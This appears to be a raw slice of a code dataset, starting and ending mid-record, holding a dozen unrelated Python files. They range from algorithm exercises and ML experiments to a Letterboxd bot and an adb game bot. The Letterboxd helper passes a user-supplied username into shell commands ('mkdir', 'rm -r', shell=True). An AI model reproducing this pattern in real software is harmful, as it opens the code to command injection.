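    left, right = 0, sum(nums)
    for i, v in enumerate(nums):
        right -= v
        if left == right:
            return i
        left += v
    return -1

assert pivot_index([1, 7, 3, 6, 5, 6]) == 3
assert pivot_index([1, 2, 3]) == -1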
list(transition_matrix.items())\n list2 = list(sub_dict_2.items())\n list1[0][1][list2[0][0]] = list2[0][1]\n transition_matrix = dict(list1)\n else:\n transition_matrix[state] = copy.deepcopy(sub_dict_1)\n list1 = list(transition_matrix.items())\n list2 = list(sub_dict_2.items())\n list1[0][1][list2[0][0]] = list2[0][1]\n transition_matrix = dict(list1)\n reward[state] = {action_1: self.getMertonReward(state), \n action_2: self.getMertonReward(state)}\n policy[state] = {action_1: 0.5, action_2: 0.5}\n all_merton_states.append(next_state_1)\n all_merton_states.append(next_state_2)\n t += 0.1\n return [transition_matrix, reward, policy]\n\nif __name__ == '__main__':\n expiry = 0.4\n r = 0.04\n mu = np.array([0.08])\n cov = np.array([[0.0009]])\n epsilon = 1e-8\n gamma = 0.2\n discount_rate = 0.8\n\n mp = mertonPortofolio(expiry, r, mu, cov, epsilon, gamma)\n\n initial_wealth = 10\n initial_state = [0, initial_wealth]\n transition_matrix, reward, policy = mp.getMertonDataAll(initial_state)\n # print(policy)\n\n mdp = mdp.MDP(transition_matrix, reward, policy, discount_rate)\n vi_dict = value_iteration.valueIteration(mdp, 100)[0]\n new_dict = {}\n for key, val in vi_dict.items():\n if val != None and val != float('nan'):\n new_dict[key] = val\n print(\"Value iteration: \", new_dict)\n\n","sub_path":"Assignments/2_Financial_Application/merton_MDP_value_iteration.py","file_name":"merton_MDP_value_iteration.py","file_ext":"py","file_size_in_byte":4763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"43328850","text":"# Example:\n# values = [{\"name\": \"Michelangelo\", \"food\": \"PIZZA\"}, {\"name\": \"Garfield\", \"food\": \"lasagna\"}]\n# string_factory(values)\n# [\"Hi, I'm Michelangelo and I love to eat PIZZA!\", \"Hi, I'm Garfield and I love to eat lasagna!\"]\n\ntemplate = \"Hi, I'm {name} and I love to eat {food}!\"\n\ndef string_factory(val):\n new = []\n for v in val:\n new.append(template.format(**v))\n # new.append(template + \".format(**v)\")\n return new\nvalues = [{\"name\": \"Michelangelo\", \"food\": \"PIZZA\"}, {\"name\": \"Garfield\", \"food\": \"lasagna\"}]\nprint(string_factory(values))\n","sub_path":"learn/th/python collection/dic/prac.py","file_name":"prac.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"229055306","text":"import sys\nimport pprint\nimport collections\nsys.stdin = open('가능한 시험 점수.txt','r')\n\n\nT = int(input())\nfor tc in range(1,T+1):\n N = int(input())\n scores = list(map(int,input().split()))\n visit = [0] * 10001\n visit[0] = 1\n for s in scores:\n for i in range(10000,-1,-1):\n if visit[i]:\n visit[i + s] = 1\n print('#{} {}'.format(tc,sum(visit)))\n \n \n\n \n","sub_path":"10월/1001/가능한 시험 점수 너비우선.py","file_name":"가능한 시험 점수 너비우선.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"574255230","text":"import requests\nimport os \nimport aiohttp \nimport asyncio \nif not os.path.exists('./pic_as'):\n os.mkdir('./pic_as')\nasync def fetch(session,url):\n print('发送请求',url)\n async with session.get(url,verify_ssl=False) as response:\n content = await response.content.read()\n file_path = './pic_as/'+ url.rsplit('/')[-1]\n with open(file_path,'wb') as fb:\n fb.write(content)\n print('下载完成:',url)\n\nasync def main():\n async with aiohttp.ClientSession() as session:\n url_list = {\n 
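# --- Editor's illustrative sketch: the exam-score record above marks every reachable
# --- subset sum in a visited array, sweeping indices downward so each score is used at
# --- most once (the classic 0/1 bitset DP). The same idea with an explicit bound check:
def possible_scores(scores, cap):
    visit = [False] * (cap + 1)
    visit[0] = True  # the empty subset scores 0
    for s in scores:
        for i in range(cap, -1, -1):
            if visit[i] and i + s <= cap:
                visit[i + s] = True
    return sum(visit)

assert possible_scores([2, 3, 5], 10) == 7  # {0, 2, 3, 5, 7, 8, 10}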
'https://pic.qiushibaike.com/system/pictures/12436/124360753/medium/7TKGSDY0E3FBRC8Q.jpg',\n 'https://pic.qiushibaike.com/system/pictures/12437/124377444/medium/JBYNB7E71BC5NYRB.jpg',\n 'https://pic.qiushibaike.com/system/pictures/12437/124375149/medium/00EA4WHMKKPFHTJN.jpg'\n }\n tasks = [asyncio.create_task(fetch(session,url)) for url in url_list]\n await asyncio.wait(tasks)\n\nif __name__ == '__main__':\n asyncio.run(main())","sub_path":"补充知识_异步编程/协程方式下载图片.py","file_name":"协程方式下载图片.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"571060158","text":"import os\nimport subprocess\n\nfrom api import api_call, post_call\nfrom config import SETTINGS\nfrom helpers import create_embed, LetterboxdError\n\n\nasync def user_embed(username):\n username = username.lower()\n url = 'https://letterboxd.com/{}'.format(username)\n lbxd_id = __check_if_fixed_search(username)\n if not lbxd_id:\n lbxd_id = await __search_profile(username)\n member_json = await __get_userjson(lbxd_id)\n display_name, avatar_url, description = await __get_infos(member_json, lbxd_id)\n fav_text, fav_posters_link = __get_favs(member_json)\n description += fav_text\n fav_img_link = ''\n if fav_posters_link:\n fav_img_link = await __upload_fav_posters(username, fav_posters_link)\n return create_embed(display_name, url, description, avatar_url,\n fav_img_link)\n\n\nasync def user_details(username):\n username = username.lower()\n lbxd_id = __check_if_fixed_search(username)\n if not lbxd_id:\n lbxd_id = await __search_profile(username)\n member_json = await __get_userjson(lbxd_id)\n display_name, avatar_url, __ = await __get_infos(member_json, lbxd_id, False)\n return username, display_name, lbxd_id, avatar_url\n\n\ndef __check_if_fixed_search(username):\n for fixed_username, lbxd_id in SETTINGS['fixed_user_search'].items():\n if fixed_username.lower() == username:\n return lbxd_id\n return ''\n\n\nasync def __search_profile(username):\n params = {\n 'input': username.replace('_', ' '),\n 'include': 'MemberSearchItem',\n 'perPage': '100'\n }\n while True:\n response = await api_call('search', params)\n if not response['items']:\n break\n for result in response['items']:\n if result['member']['username'].lower() == username:\n return result['member']['id']\n if response.get('next'):\n params['cursor'] = response['next']\n else:\n break\n raise LetterboxdError('The user **' + username + '** wasn\\'t found.')\n\n\nasync def __get_userjson(lbxd_id):\n member_response = await api_call('member/{}'.format(lbxd_id))\n if member_response == '':\n raise LetterboxdError(\n 'The user wasn\\'t found. 
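# --- Editor's sketch (hypothetical URLs; requires aiohttp): the downloader above starts
# --- one task per URL. For larger lists, a semaphore bounds how many downloads run
# --- concurrently while still overlapping the network waits:
import asyncio
import aiohttp

async def fetch_bounded(session, sem, url):
    async with sem:
        async with session.get(url) as resp:
            return url, len(await resp.read())

async def download_all(urls, limit=3):
    sem = asyncio.Semaphore(limit)
    async with aiohttp.ClientSession() as session:
        return await asyncio.gather(*(fetch_bounded(session, sem, u) for u in urls))

# asyncio.run(download_all(['https://example.com/a.jpg', 'https://example.com/b.jpg']))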
' +\n 'They may have refused to be reachable via the API.')\n return member_response\n\n\nasync def __get_infos(member_json, lbxd_id, with_stats=True):\n display_name = member_json['displayName']\n avatar_url = member_json['avatar']['sizes'][-1]['url']\n description = '**'\n if member_json.get('location'):\n description += member_json['location'] + '** -- **'\n if with_stats:\n stats_json = await api_call('member/{}/statistics'.format(lbxd_id))\n description += str(stats_json['counts']['watches']) + ' films**\\n'\n return display_name, avatar_url, description\n\n\ndef __get_favs(member_json):\n description = ''\n fav_posters_link = list()\n for fav_film in member_json['favoriteFilms']:\n fav_name = fav_film['name']\n if fav_film.get('poster'):\n for poster in fav_film['poster']['sizes']:\n if 150 < poster['width'] < 250:\n fav_posters_link.append(poster['url'])\n if fav_film.get('releaseYear'):\n fav_name += ' (' + str(fav_film['releaseYear']) + ')'\n for link in fav_film['links']:\n if link['type'] == 'letterboxd':\n fav_url = link['url']\n description += '[{0}]({1})\\n'.format(fav_name, fav_url)\n return description, fav_posters_link\n\n\nasync def __upload_fav_posters(username, fav_posters_link):\n # Download posters\n if not os.path.exists(username):\n os.popen('mkdir ' + username)\n img_cmd = 'convert '\n for index, fav_poster in enumerate(fav_posters_link):\n img_data = await api_call(fav_poster, None, False, False)\n temp_fav = '{0}/fav{1}.jpg'.format(username, index)\n img_cmd += temp_fav + ' '\n with open(temp_fav, 'wb') as handler:\n handler.write(img_data)\n\n # Upload to Cloudinary\n img_cmd += '+append {}/fav.jpg'.format(username)\n subprocess.call(img_cmd, shell=True)\n with open('{}/fav.jpg'.format(username), 'rb') as pic:\n bin_pic = pic.read()\n os.popen('rm -r ' + username)\n upload_url = 'https://api.cloudinary.com/v1_1/'\n upload_url += SETTINGS['cloudinary']['cloud_name'] + '/image/upload'\n params = {'file': bin_pic,\n 'upload_preset': SETTINGS['cloudinary']['preset']}\n result = await post_call(upload_url, params)\n return result['url']\n","sub_path":"user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":4562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"63756285","text":"import pandas as pd\r\nimport numpy as np\r\nimport math\r\nimport csv\r\nimport sys\r\nimport matplotlib.pyplot as plt\r\nfrom lineaRegression import LineaRegression\r\n\r\n#command line argument variables\r\ntrainData = sys.argv[1]\r\ntestData = sys.argv[2]\r\n\r\n#Add the Labels\r\nhouse_train = pd.read_csv(trainData, names =['CRIM','ZIN','INDUS','CHAS','NOX','RM','AGE','DIS','RAD','TAX','PIRATIO','B','LSTAT','MEDV'] )\r\nhouse_test = pd.read_csv(testData, names =['CRIM','ZIN','INDUS','CHAS','NOX','RM','AGE','DIS','RAD','TAX','PIRATIO','B','LSTAT','MEDV'] )\r\n\r\n#setting up python lists for plotting\r\ntrainX = [2, 4, 6, 8, 10, 12, 14, 16, 18, 20]\r\ntestX = [2, 4, 6, 8, 10, 12, 14, 16, 18, 20]\r\ntrainY = []\r\ntestY = []\r\nd = 2\r\nwhile d <= 20:\r\n\r\n #insert our 2 random sampled rows\r\n s1 = np.random.normal(0, 0.1, len(house_train.index))\r\n s2 = np.random.normal(0, 0.1, len(house_train.index))\r\n house_train.insert(0, \"\", s1, True)\r\n house_train.insert(0, \"\", s2, True)\r\n s1 = np.random.normal(0, 0.1, len(house_test.index))\r\n s2 = np.random.normal(0, 0.1, len(house_test.index))\r\n house_test.insert(0, \"\", s1, True)\r\n house_test.insert(0, \"\", s2, True)\r\n\r\n # Selecting all but last column of 
data frame with all rows\r\n x_train = house_train.iloc[:,0:-1].values\r\n x_test = house_test.iloc[:,0:-1].values\r\n\r\n # Selecting last column of data frame for train/test data as matrix\r\n y_train = (np.matrix(house_train.iloc[:,-1].values, dtype=float)).T\r\n y_test = (np.matrix(house_test.iloc[:,-1].values, dtype=float)).T\r\n\r\n #Do the Calculation\r\n output = LineaRegression(np.matrix(x_train), y_train)\r\n output2 = LineaRegression(np.matrix(x_test), y_test)\r\n\r\n trainY.append(output.ase())\r\n testY.append(output2.ase())\r\n\r\n d = d + 2\r\n\r\n#plot graphs\r\nplt.plot(trainX, trainY)\r\nplt.xlabel('d')\r\nplt.ylabel('ASE')\r\nplt.title('Training ASE over different d')\r\nplt.show()\r\n\r\nplt.plot(testX, testY)\r\nplt.xlabel('d')\r\nplt.ylabel('ASE')\r\nplt.title('Testing ASE over different D')\r\nplt.show()\r\n","sub_path":"q1_4.py","file_name":"q1_4.py","file_ext":"py","file_size_in_byte":2017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"358439637","text":"import random\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\nimport torch.backends.cudnn as cudnn\nimport os\nimport sys\nfrom distutils.dir_util import copy_tree\nimport aws_utils\nimport pickle\nimport logging\nfrom copy import deepcopy\n\n\nclass RNGSeed:\n def __init__(self, seed, deterministic=True):\n self.seed = seed\n self.deterministic = deterministic\n self.set_random_seeds()\n\n def set_random_seeds(self):\n seed = self.seed\n random.seed(seed)\n np.random.seed(seed)\n cudnn.enabled = True\n\n if self.deterministic:\n cudnn.benchmark = False\n cudnn.deterministic = True\n else:\n cudnn.benchmark = True\n\n torch.manual_seed(seed)\n torch.cuda.manual_seed(seed)\n\n def get_save_states(self):\n rng_states = {\n \"random_state\": random.getstate(),\n \"np_random_state\": np.random.get_state(),\n \"torch_random_state\": torch.get_rng_state(),\n \"torch_cuda_random_state\": torch.cuda.get_rng_state_all(),\n }\n return rng_states\n\n def load_states(self, rng_states):\n random.setstate(rng_states[\"random_state\"])\n np.random.set_state(rng_states[\"np_random_state\"])\n torch.set_rng_state(rng_states[\"torch_random_state\"])\n torch.cuda.set_rng_state_all(rng_states[\"torch_cuda_random_state\"])\n\n\ndef save(\n folder,\n epochs,\n rng_seed,\n model,\n optimizer,\n history=None,\n s3_bucket=None,\n):\n\n checkpoint = {\n \"epochs\": epochs,\n \"rng_seed\": rng_seed.get_save_states(),\n \"optimizer\": optimizer.state_dict(),\n \"model\": model.state_dict(),\n \"arch_params\": model._modules['module']._arch_parameters\n }\n\n ckpt = os.path.join(folder, \"model.ckpt\")\n torch.save(checkpoint, ckpt)\n\n if history is not None:\n history_file = os.path.join(folder, \"history.pkl\")\n with open(history_file, \"wb\") as f:\n pickle.dump(history, f)\n\n log = os.path.join(folder, \"log.txt\")\n\n if s3_bucket is not None:\n aws_utils.upload_to_s3(ckpt, s3_bucket, ckpt)\n aws_utils.upload_to_s3(log, s3_bucket, log)\n if history is not None:\n aws_utils.upload_to_s3(history_file, s3_bucket, history_file)\n\ndef load(folder, rng_seed, model, optimizer, s3_bucket=None):\n # Try to download log and ckpt from s3 first to see if a ckpt exists.\n ckpt = os.path.join(folder, \"model.ckpt\")\n history_file = os.path.join(folder, \"history.pkl\")\n history = None\n\n if s3_bucket is not None:\n aws_utils.download_from_s3(ckpt, s3_bucket, ckpt)\n try:\n aws_utils.download_from_s3(history_file, s3_bucket, history_file)\n except:\n 
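# --- Editor's sketch of the quantity plotted in the record above: the average squared
# --- error (ASE) of an ordinary-least-squares fit, here computed with the normal
# --- equations (the record's LineaRegression class lives in a module not shown):
import numpy as np

def ase(X, y):
    w = np.linalg.solve(X.T @ X, X.T @ y)  # least-squares weights
    residuals = X @ w - y
    return float(np.mean(residuals ** 2))

rng = np.random.default_rng(0)
X = rng.normal(size=(50, 3))
y = X @ np.array([1.0, -2.0, 0.5]) + 0.1 * rng.normal(size=50)
assert ase(X, y) < 0.02  # close to the 0.01 noise variance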
logging.info(\"history.pkl not in s3 bucket\")\n\n if os.path.exists(history_file):\n with open(history_file, \"rb\") as f:\n history = pickle.load(f)\n\n checkpoint = torch.load(ckpt)\n\n epochs = checkpoint[\"epochs\"]\n rng_seed.load_states(checkpoint[\"rng_seed\"])\n model.load_state_dict(checkpoint[\"model\"])\n optimizer.load_state_dict(checkpoint[\"optimizer\"])\n module = model.module\n params = [\n module.alphas_normal,\n module.alphas_reduce,\n module.betas_normal,\n module.betas_reduce,\n ]\n \n for p, s in zip(params, checkpoint['arch_params']):\n p = s\n\n logging.info(\"Resumed model trained for %d epochs\" % epochs)\n\n return epochs, history\n\n","sub_path":"train_utils.py","file_name":"train_utils.py","file_ext":"py","file_size_in_byte":3500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"279722496","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport time\n \nclass Timer(object):\n def __init__(self, start_time=time.time(), limit=100):\n self.start_time = start_time\n self.limit = limit\n \n def __call__(self, step, mess='', prints=True):\n if prints and (step % self.limit != 0) and (step > 10):\n return\n message = '[%8d][%s] %s' % (step, hms(self.start_time), mess)\n if prints:\n print(message)\n else:\n return message\n \n\ndef hms(start_time):\n t = int(time.time() - start_time)\n m, s = t//60, t % 60\n h, m = m//60, m % 60\n if h > 0:\n return '%2dh%02dm%02ds' % (h, m, s)\n elif m > 0:\n return '%5dm%02ds' % (m, s)\n else:\n return '%8ds' % s","sub_path":"image_generation/utils/timer.py","file_name":"timer.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"39621447","text":"import cv2\nimport numpy as np\nimport math\nimport subprocess\nimport sys\nimport random\nimport os\nimport time\n\nSTART_OFFSET = 2 / 3\nCOEFF = 185\n\n\ndef getScreenshot(screenshotPath):\n process = subprocess.Popen(\n 'adb shell screencap -p', shell=True, stdout=subprocess.PIPE)\n screenshot = process.stdout.read()\n if sys.platform == 'win32':\n screenshot = screenshot.replace(b'\\r\\n', b'\\n')\n f = open(screenshotPath, 'wb')\n f.write(screenshot)\n f.close()\n\n\ndef press(time):\n command = 'adb shell input swipe {x1} {y1} {x2} {y2} {duration}'.format(\n x1=random.randint(0, 1080),\n y1=random.randint(0, 1920),\n x2=random.randint(0, 1080),\n y2=random.randint(0, 1920),\n duration=round(time)\n )\n os.system(command)\n\n\ndef getDistance(screenshotPath):\n screenshot = cv2.imread(screenshotPath)\n hsvScreenshot = cv2.cvtColor(screenshot, cv2.COLOR_BGR2HSV)\n\n penguinMask = cv2.inRange(hsvScreenshot, np.array(\n [0, 2, 30]), np.array([175, 35, 65]))\n cv2.imwrite(\"penguin_mask.png\", penguinMask)\n\n possiblePenguinBottomYWithW = []\n tempW = 1\n preAppend = []\n for i, j in enumerate(penguinMask):\n if (j == 255).any():\n if (penguinMask[i - 1] != 255).all():\n preAppend.append(i)\n if (penguinMask[i + 1] != 255).all():\n preAppend = preAppend + [i, tempW]\n possiblePenguinBottomYWithW.append(preAppend)\n tempW = 1\n preAppend = []\n else:\n tempW = tempW + 1\n\n for i in possiblePenguinBottomYWithW:\n print(\"Penguin: Possible Y: Start:\",\n i[0], \"End:\", i[1], \"Weight:\", i[2])\n\n def getW(elem): return elem[-1]\n possiblePenguinBottomYWithW.sort(key=getW, reverse=True)\n penguinBottomY = possiblePenguinBottomYWithW[0][1]\n penguinHeight = penguinBottomY - possiblePenguinBottomYWithW[0][0]\n print(\"Penguin: 
Selected Y:\", penguinBottomY)\n print(\"Penguin: Height:\", penguinHeight)\n\n possiblePenguinBottomX = np.where(penguinMask[penguinBottomY] == 255)[0]\n for i in possiblePenguinBottomX:\n print(\"Penguin: Possible X:\", i)\n\n penguinBottomX = possiblePenguinBottomX[round(\n len(possiblePenguinBottomX)/2)]\n print(\"Penguin: Selected X:\", penguinBottomX)\n\n startCenterX = penguinBottomX\n startCenterY = penguinBottomY - round(penguinHeight / 15)\n\n print(\"Start Center:\", startCenterX, startCenterY)\n\n endMask = cv2.inRange(hsvScreenshot, np.array(\n [0, 180, 255]), np.array([1, 195, 255]))\n cv2.imwrite(\"end_mask.png\", endMask)\n\n possibleEndBottomYWithW = []\n tempW = 1\n for i, j in enumerate(endMask):\n if (j == 255).any():\n if (endMask[i + 1] != 255).all():\n possibleEndBottomYWithW.append([i, tempW])\n tempW = 1\n else:\n tempW = tempW + 1\n\n for i in possibleEndBottomYWithW:\n print(\"End: Possible Y:\", i[0], \"Weight:\", i[1])\n\n possibleEndBottomYWithW.sort(key=getW, reverse=True)\n for i, j in enumerate(possibleEndBottomYWithW):\n try:\n if abs(j[1] - possibleEndBottomYWithW[i + 1][1]) < 3:\n if j[0] < possibleEndBottomYWithW[i + 1][0]:\n possibleEndBottomYWithW.pop(i + 1)\n else:\n possibleEndBottomYWithW.pop(i)\n except:\n continue\n\n endBottomY = possibleEndBottomYWithW[0][0]\n print(\"End: Selected Y:\", endBottomY)\n\n possibleEndBottomX = np.where(endMask[endBottomY] == 255)[0]\n for i in possibleEndBottomX:\n print(\"End: Possible X:\", i)\n\n endBottomX = possibleEndBottomX[round(\n len(possibleEndBottomX)/2)]\n print(\"End: Selected X:\", endBottomX)\n\n endCenterX = endBottomX\n endCenterY = endBottomY - round(penguinHeight * 1 / 8)\n\n print(\"End Center:\", endCenterX, endCenterY)\n\n distance = math.sqrt((endCenterX - startCenterX)\n ** 2 + (endCenterY - startCenterY) ** 2) / penguinHeight\n print(\"Distance:\", distance)\n\n return distance\n\n\ndef main():\n while True:\n input()\n getScreenshot(\"screenshot.png\")\n press((getDistance(\"screenshot.png\") - START_OFFSET) * COEFF)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"82457884","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.datasets import make_regression\nfrom sklearn.preprocessing import StandardScaler, MinMaxScaler\nfrom keras.models import Sequential\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\nfrom keras.optimizers import SGD, Adam\nfrom keras.constraints import maxnorm\nfrom keras.layers import Dense, Conv2D, MaxPooling2D\nfrom ast import literal_eval\nimport my_functions\nfrom operator import add\nfrom itertools import chain\nfrom sklearn.decomposition import PCA\nfrom sklearn.model_selection import KFold\nnp.set_printoptions(threshold=np.inf)\n\ndf = pd.read_csv('Data/residual_dataset_new.csv', header=0)\ndf.reset_index(drop=True,inplace=True)\n\n# Model configuration\nbatch_size = 5\nloss_function = 'mean_squared_error'\nno_epochs = 100\noptimizer = Adam(lr=0.001)\nids = []\ntesting_pers =[]\ntesting_lables = []\ntesting_post_MM = []\ntesting_post_true = [] \ntesting_id = []\nevaluating_pers = []\nevaluating_lables = []\nevaluating_post_MM = []\nevaluating_post_true = []\nevaluating_id = []\n\ndef get_data():\n\n training_set = []\n lables = []\n post_ts_MM = []\n post_ts_true = []\n pre_ts_true = []\n\n for index, row in 
df.iterrows():\n if sum(literal_eval(df.true_post_finger_pressure_cycle[index])) == 0:\n continue\n if (df.roottable_case_id_text.values[index]) == 217:\n testing_pers.append([df.roottable_age_value.values[index], df.roottable_sex_item.values[index], df.clinical_visits_body_mass_index_value.values[index], df.clinical_visits_cpet_vo2max_value.values[index],\n df.clinical_visits_pre_24h_dbp_mean_value.values[index], df.clinical_visits_pre_24h_sbp_mean_value.values[index], df.exercise_value.values[index]])\n testing_lables.append(literal_eval(df.estimate_error[index]))\n testing_post_MM.append(literal_eval(df.mm_post_finger_pressure_cycle[index]))\n testing_post_true.append(literal_eval(df.true_post_finger_pressure_cycle[index]))\n testing_id.append(df.roottable_case_id_text.values[index])\n elif (df.roottable_case_id_text.values[index]) == 67:\n evaluating_pers.append([df.roottable_age_value.values[index], df.roottable_sex_item.values[index], df.clinical_visits_body_mass_index_value.values[index], df.clinical_visits_cpet_vo2max_value.values[index],\n df.clinical_visits_pre_24h_dbp_mean_value.values[index], df.clinical_visits_pre_24h_sbp_mean_value.values[index], df.exercise_value.values[index]])\n evaluating_lables.append(literal_eval(df.estimate_error[index]))\n evaluating_post_MM.append(literal_eval(df.mm_post_finger_pressure_cycle[index]))\n evaluating_post_true.append(literal_eval(df.true_post_finger_pressure_cycle[index]))\n evaluating_id.append(df.roottable_case_id_text.values[index])\n else:\n training_set.append([df.roottable_age_value.values[index], df.roottable_sex_item.values[index], df.clinical_visits_body_mass_index_value.values[index], df.clinical_visits_cpet_vo2max_value.values[index],\n df.clinical_visits_pre_24h_dbp_mean_value.values[index], df.clinical_visits_pre_24h_sbp_mean_value.values[index], df.exercise_value.values[index]])\n lables.append(literal_eval(df.estimate_error[index]))\n post_ts_MM.append(literal_eval(df.mm_post_finger_pressure_cycle[index]))\n post_ts_true.append(literal_eval(df.true_post_finger_pressure_cycle[index]))\n pre_ts_true.append(literal_eval(df.pre_finger_pressure_cycle[index]))\n ids.append(df.roottable_case_id_text.values[index])\n\n x_values = pd.DataFrame(training_set).values\n y_all = lables \n\n ts = [] \n ts.extend(pre_ts_true)\n ts.extend(post_ts_true)\n ts = np.array(ts)\n mean_ts = my_functions.make_mean_vector(ts)\n ts_wo_mean = my_functions.subtract_mean_from_post_ts_data(ts, mean_ts)\n mean_vector_pre = my_functions.make_mean_vector(pre_ts_true)\n pre_ts_wo_mean = my_functions.subtract_mean_from_post_ts_data(pre_ts_true, mean_vector_pre)\n\n # PCA\n pca_model = PCA(0.95)\n pca_model.fit(ts_wo_mean)\n loadings = pca_model.transform(pre_ts_wo_mean) # number of components: 4\n\n min_max_scaler = MinMaxScaler()\n x_norm = min_max_scaler.fit_transform(x_values)\n y_all = np.array(y_all)\n\n train_x = np.array(x_norm)\n train_y = np.array(y_all)\n\n return train_x, train_y, post_ts_MM, post_ts_true, min_max_scaler \ntrain_x, train_y, post_ts_MM, post_ts_true, min_max_scaler = get_data()\nprint('Predicting for person with trial ID: ', evaluating_id[0])\n\ndef create_model():\n ### FUNCTIONAL API MODEL ###\n inputs = keras.Input(shape=(7,))\n dense1 = layers.Dense(50, activation=\"relu\")(inputs)\n dense2 = layers.Dense(100, activation=\"relu\")(dense1)\n dense3 = layers.Dense(150, activation=\"relu\")(dense2)\n outputs = layers.Dense(100)(dense3)\n model = keras.Model(inputs=inputs, outputs=outputs)\n\n model.compile(loss=loss_function, 
optimizer=optimizer)\n\n return model\n# model = create_model()\n\ndef fit_model(model):\n history = model.fit(train_x, train_y, epochs=no_epochs, batch_size=batch_size, verbose=0)\n\n # Evaluate the model\n # train_mse = model.evaluate(train_x, train_y, verbose=0)\n # test_mse = model.evaluate(test_x, test_y, verbose=0)\n # print('Train loss: %.3f, Test: %.3f' % (train_mse, test_mse))\n\n return model\n# model = fit_model()\n\ndef create_model_saved_weights():\n inputs = keras.Input(shape=(7,))\n dense1 = layers.Dense(50, activation=\"relu\")(inputs)\n dense2 = layers.Dense(100, activation=\"relu\")(dense1)\n dense3 = layers.Dense(150, activation=\"relu\")(dense2)\n outputs = layers.Dense(100)(dense3)\n model = keras.Model(inputs=inputs, outputs=outputs)\n\n model.compile(loss=loss_function, optimizer=optimizer)\n\n model.load_weights(\"Data/residual_weights_real_pat_\" + str(evaluating_id[0]))\n\n # model.summary()\n\n return model\n\n## TESTING ##\ndef predict(predict_pers_x, predict_pers_y, model, post_ts_MM, post_ts_true, i):\n predict_pers_xx = predict_pers_x.reshape(predict_pers_x.shape[0], 1)\n prediction = model.predict(predict_pers_xx.T)\n \n adding_prediction = [b - a for a, b in zip(prediction[0], post_ts_MM[0])]\n\n if i == 1:\n plt.plot(prediction[0], 'g')\n plt.plot(predict_pers_y[0], 'b')\n plt.show()\n\n plt.plot(adding_prediction, color='darkorange', label = 'Prediction')\n plt.plot(post_ts_true[0], color='midnightblue', label= 'True curve')\n plt.plot(post_ts_MM[0], color='crimson', label='Mechanistic model estimate')\n plt.legend()\n plt.title('Residual model with real data')\n plt.xlabel('Time points [-]')\n plt.ylabel('Blood pressure [mmHg]')\n plt.gcf().set_dpi(200)\n plt.show()\n\n # Calculate erorrs\n dbp = min(adding_prediction)\n sbp = max(adding_prediction)\n pp = sbp-dbp\n MAP = np.mean(adding_prediction)\n dbp_true = min(post_ts_true[0])\n sbp_true = max(post_ts_true[0])\n pp_true = sbp_true-dbp_true\n MAP_true = np.mean(post_ts_true[0])\n\n point_error = abs(prediction[0]-predict_pers_y[0])\n total_cycle_error = sum(abs(prediction[0]-predict_pers_y[0]))\n dbp_error = abs(dbp-dbp_true)\n sbp_error = abs(sbp-sbp_true)\n pp_error = abs(pp-pp_true)\n MAP_error = abs(MAP-MAP_true)\n\n print('Point error = ', np.mean(point_error), np.std(point_error))\n print('DBP error = ', np.mean(dbp_error), np.std(dbp_error))\n print('SBP error = ', np.mean(sbp_error), np.std(sbp_error))\n print('PP error = ', np.mean(pp_error), np.std(pp_error))\n print('MAP error = ', np.mean(MAP_error), np.std(MAP_error))\n print('Total error = ', np.mean(total_cycle_error), np.std(total_cycle_error))\n\n return np.mean(total_cycle_error)\n# error = predict()\n\n\n## RUN SEVERAL TIMES AND SAVE THE BEST MODEL ##\n'''\nbest_error = 4000\nevaluating_pers = np.array(evaluating_pers) \nevaluating_pers = min_max_scaler.transform(evaluating_pers)\nfor i in range(30):\n model_eval = create_model()\n model_fitted = fit_model(model_eval)\n error = predict(evaluating_pers.T, evaluating_lables, model_fitted, evaluating_post_MM, evaluating_post_true, 0)\n print('Iteration: ', i, ' with error: ', error)\n if error < best_error:\n print('New best error on number ', i,'. 
Error = ', error)\n model_fitted.save_weights('Data/residual_weights_real_pat_' + str(evaluating_id[0]))\n best_error = error\nprint('The best achieved error for ', evaluating_id[0], ' was: ', best_error)\n'''\n\n## EVALUATE ON THE PERSON LEFT OUT ##\ntesting_pers = np.array(testing_pers) \ntesting_pers = min_max_scaler.transform(testing_pers)\ntesting_lables = np.array(testing_lables)\nmodel_test = create_model_saved_weights()\nprint('Testing on person with trial ID: ', testing_id[0])\nprint(testing_pers.T)\nerror1 = predict(testing_pers.T, testing_lables, model_test, testing_post_MM, testing_post_true, 1)\n","sub_path":"Models/residual_real_model.py","file_name":"residual_real_model.py","file_ext":"py","file_size_in_byte":9037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"475669873","text":"# coding:utf8\n\nimport re\nfrom os import path\nfrom util.utils import get_string\nfrom util.log import warn\nfrom traceback import format_exc\nfrom util.redis_cache import get_cache, set_cache, del_cache\nimport os\nfrom settings_cms import REDIS_CONFIG, COOKIE_KEY, BASE_DIR, USE_CUSTOM_SETTING\n\n_base_path = path.join(BASE_DIR, 'ui', USE_CUSTOM_SETTING)\nimport shutil\nfrom settings_cms import USER_FILES_PATH, STATIC_FILES_PATH\nimport json\nfrom distutils import dir_util\nfrom util.config_utils import *\nfrom datetime import datetime\n\n\ndef get_abs_file_path_and_new_file_path(file_path):\n file_path = 